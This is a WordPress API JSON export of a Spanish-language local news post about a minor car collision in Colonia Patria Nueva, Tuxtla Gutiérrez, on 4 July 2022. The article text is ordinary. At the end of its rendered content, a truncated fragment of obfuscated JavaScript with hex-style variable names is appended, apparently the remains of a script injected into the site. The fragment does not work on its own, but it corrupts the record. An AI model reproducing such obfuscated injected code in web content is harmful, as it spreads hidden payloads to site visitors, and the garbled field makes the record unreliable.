{"id":3431,"date":"2022-07-04T23:11:15","date_gmt":"2022-07-04T23:11:15","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3431"},"modified":"2022-07-04T23:11:16","modified_gmt":"2022-07-04T23:11:16","slug":"colisionan-unidades-en-la-patria-nueva","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3431","title":{"rendered":"Colisionan unidades en la Patria Nueva"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1656976128967-1024x576.jpg\" alt=\"\" class=\"wp-image-3432\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1656976128967-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1656976128967-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1656976128967-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1656976128967.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 4 de julio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Dos unidades colisionaron este lunes por la tarde en la Avenida Nogal Poniente y Calle Cipr\u00e9s de la Colonia Patria Nueva con un saldo de da\u00f1os materiales menores.Los reportes de tr\u00e1nsito informaron que, una unidad Spark de color blanco de una empresa de telecomunicaciones circulaba de Sur a Norte y se pas\u00f3 la preferencia. Esto ocasion\u00f3 que, un Vw Vento de color gris, que corr\u00eda en el carril de Poniente a Oriente termin\u00f3 chocando al no poder frenar pues iba de bajada.Afortunadamente no hubo lesionados. Tras el arribo de los elementos de tr\u00e1nsito, los involucrados llegaron a un acuerdo econ\u00f3mico, y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 4 de julio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Dos unidades colisionaron este lunes por la tarde en la Avenida Nogal Poniente y Calle Cipr\u00e9s de la Colonia Patria Nueva con un saldo de da\u00f1os materiales menores.Los reportes de tr\u00e1nsito informaron que, una unidad Spark de color blanco de una empresa de telecomunicaciones &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3432,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3431","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3431","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3431"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3431\/revisions"}],"predecessor-version":[{"id":3433,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3431\/revisions\/3433"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3432"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3431"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3431"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3431"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}